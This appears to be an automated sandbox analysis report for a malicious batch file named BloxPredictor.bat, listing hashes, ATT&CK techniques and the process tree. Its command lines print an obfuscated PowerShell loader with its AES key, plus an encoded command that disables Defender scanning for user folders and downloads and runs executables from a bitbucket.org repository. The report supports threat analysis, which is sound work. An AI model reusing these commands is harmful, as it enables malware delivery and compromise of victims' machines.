95ac6e414cd46ab5ec8d652944120157bedb5a6373efc5ee34656b0d0e6ed9ef

General

Target

BloxPredictor.bat
Size

24KB
MD5

a4a8c94e504ac6ca0ab89e9602757b7d
SHA1

b6e014f2ee929e6522c2f88cef198e8488d1b076
SHA256

95ac6e414cd46ab5ec8d652944120157bedb5a6373efc5ee34656b0d0e6ed9ef
SHA512

29dd2a53d7cad6440c58b30702517796565f8b91d837cf7ad12b29a4f831c32a7011eefb19868048c04f500ca726e6313574b178baea54cb4944a2878e917fa8
SSDEEP

384:XjkB9T5RQ04oNa0VVP/7hdD4HO6oboIsR6a5toa9nb8QbUNFu8BHirCtc:g9TDQ0rD8obYD5tnAbTliEc

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	4752	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4920	BloxPredictor.bat.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4920	BloxPredictor.bat.exe
4920	BloxPredictor.bat.exe
4920	BloxPredictor.bat.exe
4752	powershell.exe
4752	powershell.exe
4752	powershell.exe
2936	powershell.exe
2936	powershell.exe
2936	powershell.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	4920	BloxPredictor.bat.exe
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeIncreaseQuotaPrivilege	4752	powershell.exe
Token: SeSecurityPrivilege	4752	powershell.exe
Token: SeTakeOwnershipPrivilege	4752	powershell.exe
Token: SeLoadDriverPrivilege	4752	powershell.exe
Token: SeSystemProfilePrivilege	4752	powershell.exe
Token: SeSystemtimePrivilege	4752	powershell.exe
Token: SeProfSingleProcessPrivilege	4752	powershell.exe
Token: SeIncBasePriorityPrivilege	4752	powershell.exe
Token: SeCreatePagefilePrivilege	4752	powershell.exe
Token: SeBackupPrivilege	4752	powershell.exe
Token: SeRestorePrivilege	4752	powershell.exe
Token: SeShutdownPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeSystemEnvironmentPrivilege	4752	powershell.exe
Token: SeRemoteShutdownPrivilege	4752	powershell.exe
Token: SeUndockPrivilege	4752	powershell.exe
Token: SeManageVolumePrivilege	4752	powershell.exe
Token: 33	4752	powershell.exe
Token: 34	4752	powershell.exe
Token: 35	4752	powershell.exe
Token: 36	4752	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3480 wrote to memory of 4444	3480	cmd.exe	67
PID 3480 wrote to memory of 4444	3480	cmd.exe	67
PID 4444 wrote to memory of 4312	4444	net.exe	68
PID 4444 wrote to memory of 4312	4444	net.exe	68
PID 3480 wrote to memory of 4920	3480	cmd.exe	69
PID 3480 wrote to memory of 4920	3480	cmd.exe	69
PID 4920 wrote to memory of 4752	4920	BloxPredictor.bat.exe	71
PID 4920 wrote to memory of 4752	4920	BloxPredictor.bat.exe	71
PID 4920 wrote to memory of 1260	4920	BloxPredictor.bat.exe	73
PID 4920 wrote to memory of 1260	4920	BloxPredictor.bat.exe	73
PID 1260 wrote to memory of 2580	1260	cmd.exe	75
PID 1260 wrote to memory of 2580	1260	cmd.exe	75
PID 4752 wrote to memory of 2936	4752	powershell.exe	76
PID 4752 wrote to memory of 2936	4752	powershell.exe	76
PID 1260 wrote to memory of 3384	1260	cmd.exe	78
PID 1260 wrote to memory of 3384	1260	cmd.exe	78

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3384	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3480
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:4312
- C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe
  "BloxPredictor.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $GjTPU = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat').Split([Environment]::NewLine);foreach ($uNHWF in $GjTPU) { if ($uNHWF.StartsWith(':: ')) { $fykia = $uNHWF.Substring(3); break; }; };$uYWwg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($fykia);$bteIa = New-Object System.Security.Cryptography.AesManaged;$bteIa.Mode = [System.Security.Cryptography.CipherMode]::CBC;$bteIa.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$bteIa.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pM/twRvK9SA5xzjGwNEJ2Q5d0efpPNEUzZ/Iw3rJnZU=');$bteIa.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('J7jeqD28Rdq8eM7GGIHP4A==');$krlZA = $bteIa.CreateDecryptor();$uYWwg = $krlZA.TransformFinalBlock($uYWwg, 0, $uYWwg.Length);$krlZA.Dispose();$bteIa.Dispose();$fhTMd = New-Object System.IO.MemoryStream(, $uYWwg);$oPqJI = New-Object System.IO.MemoryStream;$RrChu = New-Object System.IO.Compression.GZipStream($fhTMd, [IO.Compression.CompressionMode]::Decompress);$RrChu.CopyTo($oPqJI);$RrChu.Dispose();$fhTMd.Dispose();$oPqJI.Dispose();$uYWwg = $oPqJI.ToArray();$XDsYK = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uYWwg);$CBJiO = $XDsYK.EntryPoint;$CBJiO.Invoke($null, (, [string[]] ('')))
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAegB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGgAdwB2ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABpAHMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAdgBhACMAPgA7ACIAOwA8ACMAZQBwAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAGwAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBkAHAAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwByAGkAcAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANgAxAC8AbgBlAHcAdABlAHMAdAA4ADEANwA0AC8AcgBhAHcALwA3AGYAOQBkAGIAZQAxADIAOQA4AGIAYgA4AGMAMgAzADUAMgBjAGIAMQA4ADcAOAAwADMAOAA2ADAAZgBkAGIAMgBlADMAZAA2ADQAYwBmAC8AYgBsAG8AbwBkAGUAeQAuAGUAeABlACcALAAgADwAIwBhAHUAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAbgB3ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAYQBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAbgB0AGkAVgBtAC4AZQB4AGUAJwApACkAPAAjAHUAZQBjACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAvAG4AZQB3AHQAZQBzAHQAOAAxADcANAAvAHIAYQB3AC8ANwBmADkAZABiAGUAMQAyADkAOABiAGIAOABjADIAMwA1ADIAYwBiADEAOAA3ADgAMAAzADgANgAwAGYAZABiADIAZQAzAGQANgA0AGMAZgAvAGsAbABzAHQAZQBzAHQALgBlAHgAZQAnACwAIAA8ACMAcQB0AHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAGIAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AHEAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAG4AdABpAFYAUABTAC4AZQB4AGUAJwApACkAPAAjAHUAZgB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAvAG4AZQB3AHQAZQBzAHQAOAAxADcANAAvAHIAYQB3AC8ANwBmADkAZABiAGUAMQAyADkAOABiAGIAOABjADIAMwA1ADIAYwBiADEAOAA3ADgAMAAzADgANgAwAGYAZABiADIAZQAzAGQANgA0AGMAZgAvAG0AaQBtAGkAbQBpAC4AZQB4AGUAJwAsACAAPAAjAGUAcAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB0AHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBhAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATQBzAFAAbwBwAFUAcAAuAGUAeABlACcAKQApADwAIwBmAGgAdgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwByAGUAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBuAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQQBuAHQAaQBWAG0ALgBlAHgAZQAnACkAPAAjAGQAdgBoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAagBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAG4AcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAG4AdABpAFYAUABTAC4AZQB4AGUAJwApADwAIwBuAGkAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAGoAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYQBqAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATQBzAFAAbwBwAFUAcAAuAGUAeABlACcAKQA8ACMAaQBuAGsAIwA+AA=="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#hwv#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS is allowed!','','OK','Error')<#tva#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2936
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1260
  - - C:\Windows\system32\choice.exe
      choice /c y /n /d y /t 1
      4⤵
      PID:2580
  - - C:\Windows\system32\attrib.exe
      attrib -h -s "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe"
      4⤵
      Views/modifies file attributes
      PID:3384

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

1

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

Web Service

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
83c4d165396a8d52c62d0f9a4687717c

SHA1
050a6b76f55e468e8868e31bbc91b54e94f3bc3e

SHA256
de384fc72d8814c341ab8b8e009679dafdbd3a7ef751f1a01199a1d984a42bde

SHA512
670c8812a1635ff4fed4c26ac0198cd905e74a8f8045217a77e0447acc62ca761586ad9cb93fd3e81533ebda88bccfcfac5dbce814f193901840e85558e13ed2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7a3a02402dc6308de813e5b21acbb4f0

SHA1
b0a0d23d28ba38ebef09aa55e002b39a334f395d

SHA256
31166900143332eac652bc3fd173e0f54658a871f2cf98013c946d2257de47bd

SHA512
786090ea8867153914dfa71b3c68a94fcf73a7e980b0540d935013f92e4a1116673074fe8663e869678a32654c772a81f46cbde7ae5959543b0d0bb3249c6ebd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2363a61a3eef69953c1b3a98e14fb53b

SHA1
564f7e2df55a4450a96b0fec3565148f1837d3cd

SHA256
87a5d7ba58e27c680cb33fa298915b17d0ad7d00d29c24282da0750816c735a4

SHA512
56973491a965d8ce557972d21ecd60420fb528c2c89bc976a49ff75dea80189509becaed6cca9603e0713b904afe5ca67e984681168cb36da6cdfa35dd54defd

Download Submit
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xrvjchfr.5gk.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/2936-254-0x0000026A59EC0000-0x0000026A59ED0000-memory.dmp

Filesize
64KB

Download
memory/2936-253-0x0000026A59EC0000-0x0000026A59ED0000-memory.dmp

Filesize
64KB

Download
memory/4752-203-0x0000012E67B80000-0x0000012E67B90000-memory.dmp

Filesize
64KB

Download
memory/4752-255-0x0000012E67B80000-0x0000012E67B90000-memory.dmp

Filesize
64KB

Download
memory/4752-201-0x0000012E67B80000-0x0000012E67B90000-memory.dmp

Filesize
64KB

Download
memory/4752-199-0x0000012E67B80000-0x0000012E67B90000-memory.dmp

Filesize
64KB

Download
memory/4920-148-0x000001B9A6BF0000-0x000001B9A6C00000-memory.dmp

Filesize
64KB

Download
memory/4920-163-0x000001B9A6BF0000-0x000001B9A6C00000-memory.dmp

Filesize
64KB

Download
memory/4920-152-0x000001B9BFE70000-0x000001B9BFE78000-memory.dmp

Filesize
32KB

Download
memory/4920-150-0x000001B9BFDD0000-0x000001B9BFDDA000-memory.dmp

Filesize
40KB

Download
memory/4920-149-0x000001B9A6BF0000-0x000001B9A6C00000-memory.dmp

Filesize
64KB

Download
memory/4920-131-0x000001B9BFDF0000-0x000001B9BFE66000-memory.dmp

Filesize
472KB

Download
memory/4920-125-0x000001B9BF400000-0x000001B9BF422000-memory.dmp

Filesize
136KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads